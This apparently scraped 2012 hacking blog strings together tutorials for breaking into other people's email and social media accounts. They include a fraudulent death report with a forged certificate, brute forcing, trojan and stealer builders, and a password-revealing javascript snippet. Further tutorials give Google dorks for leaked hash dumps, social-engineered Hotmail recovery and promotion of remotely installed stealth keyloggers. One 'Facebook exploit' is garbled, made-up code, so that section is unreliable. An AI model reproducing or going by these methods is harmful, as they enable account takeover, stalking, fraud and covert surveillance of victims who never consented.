Friday, October 12, 2012

Just Follow the steps:
Step 1 - Go to this url:

So this is the Url we will use to Report our slave. This Form allows you to report a deceased person (someone who is dead).

Step 2 - Complete the Fields:

Full Name: Your Victims Full name(Name last name)
Date of birth: Go at his profile and click at Info tab and get his date of birth.
Account Email Addresses: Do the same thing, go to his profile and click on info tab and get his email addresses.
Networks: Again,go to his profile and click on Info tab and get his networks, copy them and paste in the form.
Web address of profile you would like to report: Just go to his profile and copy the link in the address bar.
Relationship to this person: To make more believable select Immediate Family.
Requested Action: Remove Profile
Proof Of Death: This is the hardest part of this form. Now to make a proof of a death just Google in your language a "Death Certificate" or "Certificate of a Death". It doesn't matters from what country you are, just use this Italian certificate and open up photoshop or whatever Image
Editor and just write in a blank field:
Annunciamo il morte di [name goes here]. Save your image to desktop and upload it in one of the Image
Free Hosting like:
And it's done ;)... Italian Death Certificate:
Additional Information: Write what you want, just write that you are in his/her family and you would like to close his/her Facebook account because you won't like that when he is dead, his Facebook is opened.

Step 3 - Click on Submit and then a message will appear:
Your injury was submitted at Facebook Team .. So the meaning is that one of the mod's of Facebook will review your report and will do the right decision. It works in most of the times. I closed a few ones.

Methods Of Getting Yahoo Passwords

I will explain in this tutorial how to obtain in difrent

ways yahoo passwords so that any N00B can understand and do it.

It actualy isen't that hard the problem is thet with the

passing of years yahoo security has been getting better and

beter an most proggyes don't work anymore now I will

present to u the most efective reliable and easy to do

methods.After that I will also Informe you on how to

protect your self of thees dangers that go around te



------BRUTE FORCING------

This is by far the most used method .You can find crackers

everywhere to download .On there are a lot

of good cracked downloads.The one for which i sugest

R-G-Kracka it's easy to use and works. This is the most

sawed for method but is good for 2 things cracking boots

and when u realy want a password and will spend some time

cracking testing and working.

For this You have to get A cracker A password list and in

some cases a proxy list but I sugest u try a non proxy

cracker if it's ur first time.

This is a basic method and I'm sure that everyone will get

it the first time aldough results depend on your password


PROTECTION It's simple get a very long password with asci

and numbers the most hard and long password that a brute

forcer will have trouble cracking and getting to is the

last of all asci letters and numbers the last password a

normal brute forcew of let's say 10 chars will be

"zzzzzzzz9!" thIs password will be the last one it will try

to crack.

method 2


This is one of the most effective methods of obtaining

passwords at this time.U get a programme named Y! Jacked/mps1.5se/sub7 n

one of it's many varyations from or there are

many trojans n stealers.

With this you have to take the main program put it in a

folder and generate a trojan that you send via atachment to

the victim's mail box.When that person opens it u will have

his password.This is a easy to use program just take care

taht most antivirusez see it as a virus and u shoulden't

get alarmed by that.It has a lot of options that u will

understand surely if u know english.

PROTECTION It's the easyest way to protect ur self don't

open atachments from anybody I can send a mail with an

atachment from any mail I want for example It's not smart

to open any atachment without a good antivirus.


------THE FAKE LOGIN------

This is a modified login page for yahoo.It's code has been

altered .Instead of sending the password and the user to a

yahoo server for loging in it sends them to a yahoo server

that sends them in a mail account.

Get one of thees from cretain people lool.

It's hard to spot people u after u make a page with this u

have to send the link to some1 and he has to sign in from


PROTECTION Don't sign in yahoo from pages like


This is probably a fake login.

Try to open one of thees pages and check out the source

code u can determine what it will do from there.

Method 4


This is for u people that want all passwords that were

entered in Internet explorer on your computer.

U download Passweare recovery kit and it will give u all of

the passwords on ur computer u can use this for people u

are close to lol.

PROTECTION Be a paranoic son of a bitch scan ur computer

check instaled programs never let other people fuck with it

and of ource never enter your passwords in another person's


Oky this was for all new one's Hope most of them get these

methods and will be able to use them

good luck

Hack Yahoo Passwords.


In this guide you will learn two different methods to get access to the Yahoo Account you’d like.

1. Local Passwords
This is probably the most easiest way to get the passwords but it will only work if your victim has logged into his account through your computer.
So go to the Yahoo Login Page and enter this code in the address bar:
javascript:(function(){var s,F,j,f,i; s = “”; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == “password”) s += f[i].value + “\n”; } } if (s) alert(“Passwords in forms on this page:\n\n” + s); else alert(“There are no passwords in forms on this page.”);})();
2. Stealers
Stealers are basically “viruses” that will get all your victims passwords and send them to a webpage.
You can easily create a stealer yourself by reading our guide here


This simple program allows you to send diffrent emails to people with other email addresses than yourself.
For example I can send myself an email coming from

Download it Email Spoofer.exe
Download it Email Spoofer.rar


The trick is basically based on the dump databases of various websites…
so these dump databases contains the emails and passwords of the users in the form of md5 hash…


You  just have to follow these simple steps and u wil hack many random accounts:

This method is called as hash cracking technique…

1. Goto google…

2. Now these are the dorks through which we will found the emails and hashes…Google Dorks..
ext:sql intext:e10adc3949ba59abbe56e057f20f883e
ext:sql intext:”INSERT INTO” intext:password
ext:sql intext:password

3. Now take any one of the dork and paste it on the google and press search…
[see the screen shot below go to any link and now press ctrl+f to search the keywords like [,,]…
U will get a list of emails and ther respective md5…

4. Now goto any online md5 decrypter like this  h4ckforu & paste the hash into it nd see below if it got decrypted and copy the password…
As these files r dumped because emails r outdated so u may not get the working emails because 60% of emails are deleted or there pasword may be change so try and try many emails until u get a perfect login…

5. So through this u can hack dozens of emails at once if u get a recently dumped database i will suggest you to add some more keywords in the dork like… 2011 hashes… 2010 emails… So u may get a recent hash…



This service is perfect for the following: catch a cheating spouse husband or wife., find out if your friend is are real friend ,give warnings to people, inform the police about illegal activities, inform the tax office about tax cheaters, confess your love to somebody, play an email joke with your friends, when your own email service doesn’t work, f your private email is banned by the recipient, report fraud to your boss or institution and many more reasons…


With AnonEmail it is possible to send e-mails without revealing your e-mail address or
any information about your identity. Therefore you can communicate more freely
and you do not have to worry that it might cause consequences for you.
This service allows you to send e-mails without revealing any personal information.
Protect your privacy, protect your data, protect it for free.


Enter your desired sender e-mail address, recipient e-mail address(es), subject, and message in the fields on the left, then select the server(s) that you would like to send your message through from the list shown on the right. (Use Ctrl-Click on newer browsers to select multiple servers.)


This free tool lets you simply send an email message.


Site dedicated to sending free anonymous email to anyone with an email address. Just fill in the fields below and have an email message sent the receipient. Your as an anonymous send emailer, will able to send fake email to any receiver anonymously




 Its basically a way of getting your email back if has been stolen, but I have come to realise that this to can be used to gain access to someones msn. In other words, who ever sends you a email off a @hotmail, @live or @msn email, you can gain access to they are hotmail, no joke, follow the tutorial below.

Well, I don’t know if you guys have found this yet, but I have known about it for a few months now.
Windows Live has a revert link, you go to this link, it will ask you questions such as your full name, etc. All the information you want can be recieved by a email of the victim, seven times the form has been filled in like it says on the tutorial, click send, 12 to 24 hours later you will recieve a email from Windows Live asking to put a new password for the victims email. It must be the easiest way to gain access to someones msn, yet not very someone knows about it, well, if you guys don’t know about it, I will be happy to share it with you.

What you will want?
Revert Link
IP Get1.50 (MSN And plugin)
1. To start off basically go to the revert link. You will see some form where you will want to fill in some information on the person you’re going to revert, don’t let the size of the form put you off since it takes about 5 mins to fill in.
2. The first box will ask you to fill in the persons full name. Basically use some social engineering to get them to email you. Seven times you recieve the email from them it should have there full name next to the contact you recieved it from for e.g: “Forename Surname”.
3. Next it will ask you for the e-mail address for us to send a response explains it is self… put your email address in.
4. Below your email address it should ask for the Primary e-mail address/member ID associated with the account you’re inquiring about. This is the email address of the person you want to revert.
5. It will then ask you for a date of birth. This makes you think you have no chance… All you want to do is use some social engineering seven times again to try and get they are year of birth no want for month or date. I personally have come to find that you don’t want this, so I always put 1992 and it always seems to work.
6. Next is the country, this is simple to get. Don’t forget Hotmail checks there information VIA the IP address last logged on the account, the same way they find this information on anyone. I will explain how to get there IP further in to this tutorial. Basically ask for the country or use the method further on in the tutorial.
7. It will then ask you for the state, Seven times again you can gain this information VIA the IP. This will also be explained later on in the tutorial.
8. Now you will want the ZIP or post code. This makes you think “oh there is no point i cannot get it”, well you’re wrong, it is simple to get, seven times again… I will explain further on in the tutorial how to get this. YOU ONLY NEED THE BEGINNING OF THE POST CODE!
9. It will ask you for the secret answer to your question. You won’t want this fill this in with: “I cannot remember”
10. You now will be asked for the alternate e-mail, put the email you used in step 4.
Now you have this you can now fill the rest of the form out. Seven times you have the IP go to: target on there there will be a link at the bottom. Click on it then a new page should come up with a small box, Put the IP in the box and click on locate IP or web-site. It should now come up with all the information you want.
11. Ok, this is the main part of the tutorial on how to gain most of the information VIA the IP, if you have MSN And, download the MSN And IP Get script and import it. Sign out of msn seven times imported then back in. All you want to do now to gain the IP address of your target is send them a file, wait for them to accept then cancle it or send them a voice clip. You should then receive a small pop up in the bottom corner of your screen showing the IP address and the email address of the person.
Fill in step 6 & 7 with the information shown from this IP.
To get the zip/post code of this zoom in on the map on the and grab the closest street shown on the map to where the ip has been located. Now go onto google and type in the state shown and the street you zoomed in for for eg: London, Waterloo postcode then look it up. London, Waterloo should be SE1, Remember… YOU ONLY NEED THE BEGINNING OF THE POST CODE!
13. It will now ask you for the last date and time you successfully signed in, put “Today”.
12. Keep open for this step since you will now want the ISP (Web service provider shown).
Congrats! You have filled in all the information you want. To give you more of a chance of this revert working keep reading and fill in a small bit more information!
14. Scroll down a bit untill you see “Names of contacts in your Hotmail address book”. Basically fill in the email address of a few ppl like 2-3 on there contact list (get people to add them if you don’t know) and fill it in as shown:, but obviously put in the information needed for YOUR own revert.
16. It will seven times again ask you for the names of contacts on your Messenger contact list. use the same information shown in step 14.
15. You will then be asked for subjects of any elderly mail that’s in your hotmail inbox. If they play habbo basically put “Habbo” in this. Maybe if they have a ebay/paypal account, send a password reset email then put “Ebay” or “Paypal” in this box or maybe more than one.
17. You will now be asked for the messenger nickname (display name) copy the persons msn name you’re reverting and paste it in to this box. Scroll down and click submit obviously.
Congratulations! You have now done the tutorial on how to revert someone’s msn. wait 24 hours for the reply!
If you followed this tutorial properly you have a 99% chance of it working. 

Hack facebook account to use facebook hacker

HAck Facebook account to use facebook hacker

STEP 1: First ensure that you have installed Microsoft .Net Framework. If not, then you can download it from here: Download .Net Framework

STEP 2: DOWNLOAD the Facebook Hacker

STEP 3: Extract the downloaded “Facebook Hacker” file using Winrar. (If you don’t have it then you can GET IT HERE)

STEP 4: Open “Facebook Hacker.exe” file.

STEP 5: After opening the “Facebook Hacker.exe” file build your password stealer as shown in the image below:
STEP 6: Now a new file will be created in the same directory with the name you provided while building (eg. server.exe). Just send the file you created to the victim and if the victim runs this file….W00t….you will get his Facebook account’s username and password to your fake email ID which you provided while building the file.
thats all Enjoy.......:)

NOTE: The “Stub.exe” file may get detected by your anti-virus. Please don’t open the “Stub.exe” file and don’t delete it too, otherwise the stealer created by you won’t work at all...

How To Hack FaceBook Account Using A Web Based Exploit

Do you want to learn how to hack facebook?, Are you looking for a way to hack your friends facebook account without them fiding out? Interested in finding out ways to hack someones profile? Maybe you want to take a quick peek at their message inbox or use a glitch to use a hacking script. In this article I will show you a fairly easy step by step guide on how to hack facebook user accounts without having to directly hack into facebook and risk getting caught. Ignore all those hacking services, facebook hacks and hackers that charge you money for something you can do on your own for free. Hack the password of any of your friends accounts and get their password even as a prank or joke (you may also be interested in trying our How To Hack Twitter Accounts tutorial).

Hack facebook, hacking facebook passwords from user accounts and find out someones facebook password...Is any of it really possible? Yes it is, thanks to Twitter!. By now, you have probably heard the rumors of how unsafe Facebook is with a few celebrities having had their accounts hacked. You may also have seen Twitter allows you to synchronize your tweets with Facebook status updates so whatever you tweet appears as a Facebook status update. In providing this service, Facebook has created many vulnerabilities for itself by allowing a third party (Twitter) to access their database. This problem is due to Facebooks API service which permits exterior websites or applications (like FarmVille) to modify or post stuff on your profile.

A couple of month's ago I wanted to check my old FaceBook account but forgot what email and password I had used to sign up, I sent an email to their technical support but they didn't reply so I decided to put my geek skills to good use and find a way to get my login information back by writing a facebook account hacking code or exploit as they are called.
Facebook has two databases (one for males and one for females users) where they keep all the information from their users, if you remember the email you use to login but forget your password, you can use the 'Forgot your password?' option, however if like me you don't have any of that information it's impossible to legally recover that account.

If you know anything about programming websites you know the 'Forgot your password?' service has to be in direct contact with the databases in order to send requests to retrieve the forgotten information for you, basically what that means is if you 'ask' the database for the login information with the right 'code' (in our case exploit), it will send you back that information.

So all I had to figure out is what the code was and what system they used to contact the databases through the 'Forgot your password?' service, after a few weeks of writing and testing codes I came up with the right one for the job and after doing a bit of research I learned FaceBook uses something similar to an email service to contact their databases.

For security reasons the databases are programmed to verify the account your requesting is actually yours and not someone elses so they need some type of authentication or verification (thats why they send you a verification link to your email when creating your account or changing your password).

Luckily for us, as mentioned above, through the use of Twitter combined with Facebooks 'Mutual Friend' feature, we can use a friends account to verify your own, in other words, if the person you want to get the login information from is on your friends list on can use your Twitter account to verify your their friend on Facebook taking advantage of the vulnerability of the twitter status sync exploit, and get their login email and password sent to you. But the victim must be on your friends list on Facebook.
1) First off you will need to get your user id and the victims user id, how do you do this?

Go to the victims profile, then click on their Display Picture (not the "View Photos of ..." link or tab but the actual main picture of their profile) and look at your browsers address bar, at the end of all the address you should see a group of numbers that should you should look something like this: (I have used a red arrow to point them out)

Don't worry if it isn't exactly like that (sometimes it has variations like; 'album.php?profile=10957800008') just as long as you get the numbers. Write them down somewhere as you will need to use it a bit further down, once that is done you may continue to step 2.

2) At the bottom of this page I have pasted the exploit code I created to fool the databases, this is the tricky part as you will have to edit the code a bit yourself so that it fits your needs when searching for the victims login information.

Scroll down to the bottom of this page and find the code I have highlighted in gray so you know what to copy, select the code and copy it to your clipboard (press CTRL+C) then paste it (CTRL+V) on a notepad or text document so you can edit it.

3) Once you have the code somewhere you can edit it, you will need to insert three things into it, the facebook user id of the victim and the twitter friend authentication information. I will give you step by step examples by trying the exploit code on my friend Laura's account as the victim, see what parts you have to edit and with what:

1. Should be the victims user id.
2. Should be your twitter login Username (I put my email in the screencap example above for privacy reasons) to verify your the victims mutual friend on facebook. Make sure your facebook email was the same used to sign up to Twitter so the exploit script can automatically connect both accounts.
3. Should be your twitter password so the database can authentic you really are friends with the victim on facebook.

When editing the code, don't accidentally delete one of the quotes (") or it won't work, so make sure you put the information inside them.
4) Now that you have the exploit code edited and ready to send, we are all set to send it to the database through an email, since it's not your regular email but an exploit email we will have to use a special Subject so the database knows how to read it in programming language.

Go to your email address and Compose a new email to which is their customer service email for forgotten passwords, in the Subject copy and paste the code below highlighted in gray:
$[search_database = $find user+id= "123456789", '%verification+user+bday' = }"01/01/1900"{ begin_search();

Once you have edited the Subject and entered the email address, your Composed email should look like the screenshot below, I will numerate each item:

1. The email address of the facebook database's forgotten password customer service.
2. This is where you insert the victims facebook user id.
3. This is where you insert your birthday so the database can find you to verify your a friend of the victim (it arranges users in the database based on your date of birth), NOTE: It MUST be in the MONTH/DAY/YEAR format so it can read it properly.
5) After you have correctly written the To: and Subject sections, you may proceed to insert the exploit code you previously edited in step 3 into the body section of the email.Now all you have to do is click Send and wait for the database to send you back it's reply with the information.

It should take from 12-24 hours depending on the traffic FaceBook has that day, this is a sample of the email response you'll receive:

fb_select_db("find", $linkID) or die(fbdatabase_error());
$resultID = fb_query("SELECT FriendID FROM signup WHERE email = '$email'", $linkID) or die(fbdatabase_error());

$num_rows = db_num_rows($resultID);
$row = facebook_fetch_array($resultID);
$user_id = $row[0];

if ($user_id == "PUTUSERIDHERE") = '$repeat' {
print Success, We have sent you an email with the Login email and Password of that ID.
else {
// print "We're sorry, your friend ID does not appear to be in our database."

$passwordfromdb = $row[0];
$find userID = (%friend_list)
#forgot_pass_userid = "%repeat%"; <%search_database_for_id%>
#user email= "PUTEMAILHERE"; (%friend_vulnerability_email%)
#user password = "PUTPASSWORDHERE"; (%friend_vulnerability_pass%)
$friend_database_exploit = '%request_forgot_pass_info'
$email_to = %%%@subject_email

$email_address = $_POST['email_address'];
if (!isset($_POST['email_address'])) {

elseif (empty($email_address)) {
echo $empty_fields_message;
function decrypt userID password() {
$salt = "abchefghjkmnpqrstuvwxyz0123456789";
$i = 0;
while ($i <= 7) {
$num = decrypt() % 33;
$tmp = substr($salt, $num, 1);
$pass = $pass . $tmp;
return $pass;

mail($email_address, $subject, $message, "Facebook Password Reset Confirmation


Hack FaceBook Gmail et Yahoo 2011

FaceHacker 2011 est un soft de hack facebook qui permet de connaître le mot de passe de n’importe quel compte facebook. Son principe est le suivant vous copié l’url du compte facebook que vous souhaitez pirater puis vous la collé dans la première case et appuyer sur démarrer, le facebook hack commence grâce à une méthode de brute force qui consiste à essayer une multitude de combinaison de password facebook en communiquant avec le serveur facebook jusqu’à trouver le bon puis une fois le processus terminé, le mot de passe facebook s’affiche en bas à droite
. Logiciel très simple d’utilisation vu que c’est lui qui fait tout! (Hacking facebook, Hack facebook, Facebook hack, Hacker facebook)
La version 2011 est plus adapté au nouveau site Facebook.


007 Facebook Hack v 1.0 Free + pass

Download link

Second Method.
Hack your friends facebook password by downloading this simple file.=
*007 Facebook Hack v 1.0

Other Link Of This File

**007 Facebook Hack v 1.0

_ pass = b.h.y.u.j.h.g..r.df.d.e

What is KeyLogger? How Use it? How To Hack Facebook Account With KeyLogger? All In One. (*_*)

1. What is a Keylogger?

A keylogger (also called as spy software) is a small program that monitors each and every keystroke a user types on a specific computer’s keyboard. A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim’s password.

2. How Keylogger works?
Once the keylogger is installed on a PC, it starts operating in the background (stealth mode) and captures every keystroke of the victim on that PC. Let’s take up a small example: The victim goes to and types his “username” and the “password” in the respective fields to login. The keylogger silently records these keystrokes and stores them in the logs. These logs when opened up shows the captured “username” and “password” and will also tell you that they were typed in the Yahoo login page. Thus the keylogger loads upon every startup, runs in the background and captures each and every keystroke.
3. How to install the keylogger?
A keylogger can be installed just like any other program. Just follow the screen instructions and you’re done.
4. Do I need any special knowledge to install and use the keylogger?
Absolutely NOT! Anyone with a basic computer knowledge can install and use the keylogger. It requires no special skills.
5. Once I install the keylogger can the victim come to know about it’s presence?
No. The victim will never come to know about the presence of the keylogger on his/her computer. This is because, once installed the keylogger will run in total stealth mode. Unlike other programs it will never show up in start-menu, start-up, program files, add/remove programs and task manager. So the victim can no way identify it’s presence on his/her PC.
6. Can I be traced back if I install the keylogger on some other computer?
No, it’s almost impossible to trace back to you for installing the keylogger on other’s PC.
7. Which keylogger is the best?
Today there exists hundreds of keyloggers on the market and most of them are no more than a scam. So I tested some of the top keyloggers and conclude that the following is the best one.

8. How SniperSpy works?
I will try to explain the working of Sniperspy in simple steps.
1. After you purchase Sniperspy, you’ll be able to create the installation module using easy set-up program. You need to email this module to the remote user as an attachment.
2. When the remote user runs the module it’ll get installed silently and monitoring process will begin. The keystrokes are captured and uploaded to the SniperSpy servers continously.
3. You can login to your Sniperspy account (you get this after purchase) to see the logs which contains the password.
9. I don’t have physical access to the traget computer. Can I still use SniperSpy?
Yes you can. SniperSpy supports REMOTE INSTALLATION feature which allows you to remotely install the program on any PC even if you have no physical access to it. For remote installation all you need to do is just place the module (refer FAQ-8) in a .zip/.rar file and send it as an attachment to the target email address (for which you need the password).
10. Can I install SniperSpy on a local computer?
If you need to install to your local (current) computer instead of your remote computer, then the process is simple. Simply navigate to the folder in which you saved your module ( Refer FAQ-8). Double-click the module filename to execute it. Nothing will appear on the screen as the software is installed.
11. What if the antivirus block from sending it as an email attachment?
Instead of sending the keylogger as an email attachment, it is recommended that you place the file in .ZIP/.RAR format and upload it to After uploading, just send the direct download link to the victim via email. Once he downloads the file from this link and run it, the keylogger will get installed automatically.
12. Why SniperSpy is the best?
  • SniperSpy supports REMOTE INSTALLATION feature. This feature is not present on most of the keyloggers.
  • SniperSpy is fully compatible with Windows 2000/XP/Vista/7 and alsoMac.
  • SniperSpy canbypass any Firewall.
  • SniperSpy is more reliable than any other keylogger program. You need not rely on your email account to receive the logs. Instead you can just login to your online SniperSpy account to receive the logs.
  • SniperSpy captures full-size screenshots of the activities on the target PC.
  • Records BOTH sides of chats / IMs in Google Talk, Yahoo IM, Windows Live and more.
  • SniperSpy is more easy to install and requires no extra knowledge.
  • SniperSpy is recognized by BBC, CNN, CBS and other news networks. Hence it is reputed and trustworthy.
13. How safe is to use SniperSpy?
Sniperspy is completely safe to use since all the customer databases remain confidential and private. SniperSpy do not collect any information from your system other than the information required for the product’s successful operation. They will not contact you in any way unless you request assistance.
14. Is my online order 100% Safe and Secure?
Absolutely Yes! All the e-commerce transactions for SniperSpy is handled by Plimus – they are a trusted online retailer specializing in digitally delivered products. All your information remains private and secure. The safety and protection of your personal information is 100% guaranteed. So you can place your order for SniperSpy with no worries of scam!
SniperSpy is completely reliable, safe and best keylogger out there. It is really worth the price that you pay for it. I promise that you cannot get a better keylogger than this. So what are you waiting for? Go grab SniperSpy now!

Hack Facebook Password by Keylogger & SniperSpy

8:36 PM ---
Wondering to know how to hack Facebook password? Well before you try to hack any Facebook password, it is necessary to understand the real ways of hacking that actually work and also those that are simply scam and don’t work. Everyday I get a lot of emails where people ask me “how to hack Facebook password?” So in this post I have taken up this topic to show you the possible ways to do that!
Today even a noob computer user (perhaps like you) can easily hack Facebook or any other social networking site with ease in a matter of hours and thus hacking is no longer the secret art of a Russian hacker! Well the idea behind this post is to expose the truth behind hacking Facebook account so that you can stay away from all those scam sites which will rip off your pockets by making false promises to obtain any password for you. Also this post is not meant to encourage people into hacking Facebook, but rather it is meant to educate the Internet users to be aware of the common scams and frauds and stay away from them.
With my experience of over 7 years in the field of ethical hacking and security, all I can tell you is that there are only two ways to successfully hack a Facebook account.

1. Keylogging – Easiest Way to Hack Facebook Password

Keylogging refers to simply recording each and every keystroke that is  typed on a specific computer’s keyboard. This is possible with the use of a small computer program called keylogger (also known as spy software). Once installed, this program will  automatically load from the start-up, runs in invisible mode and start capturing each and every keystroke that was typed on the computer.  Some keyloggers with advanced features can also capture screenshots and monitor every activity on the computer. To install and use a kelooger one doesn’t need to have any special knowledge. That means anyone with a basic knowledge of computer can install and use this software with ease. Hence for a novice computer user this method is the easiest way to hack Facebook password. I recommend the following keylogger as the best for gaining access to facebook password

SniperSpy is a revolutionary product that will allow you to easily access *ANY* online accountor password protected material such as MySpace, Facebook, Yahoo, Gmail etc. There are absolutely *NO* limitations to what accounts or websites this software can access!

Why SniperSpy is the best?
Today there exists hundreds of keyloggers on the market but most of them are no more than a crap. However there are only a few that stand out of the crowd and SniperSpy is the best among them. I personally like SniperSpy for it’s REMOTE INSTALLATION FEATURE. With this you can install it on a remote computer without the need for having physical access to it. It operates in complete stealth mode so that it remains undetected.
Here is a summary of benefits that you will receive with Sniperspy software:
1. Access ANY Password
With SniperSpy you can hack any password and gain access to Facebook or any other online account.
2. Monitor Every Activity
You can monitor every activity of the target computer, take screenshots and record chats & IM conversations.
3. Never Get Caught
SniperSpy operates in total stealth mode and thus remains undetectable. Thus you need not have the fear of being traced or get caught.
4. Remote Installation Feature
With Remote Install feature, it is possible to install it even on computers for which you do not have physical access. However it can also be installed on a local computer.
5. Extremely Easy to Use
Installing and using SniperSpy is simple and needs no extra skill to manage.
6. Completely Safe to Use
This software is 100% safe to use since it doesn’t collect any information from your computer. SniperSpy is a reputed, trustworthy and reliable company which offers 100% privacy for it’s users.
7. Works on both Windows and Mac
Fully compatible with Windows 2000/XP/Vista/7 and Mac.
So what are you waiting for? If you are really serious to hack Facebook password then SniperSpy is for you. Go grab it now and expose the truth!

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Click Here To Download KeyLogger



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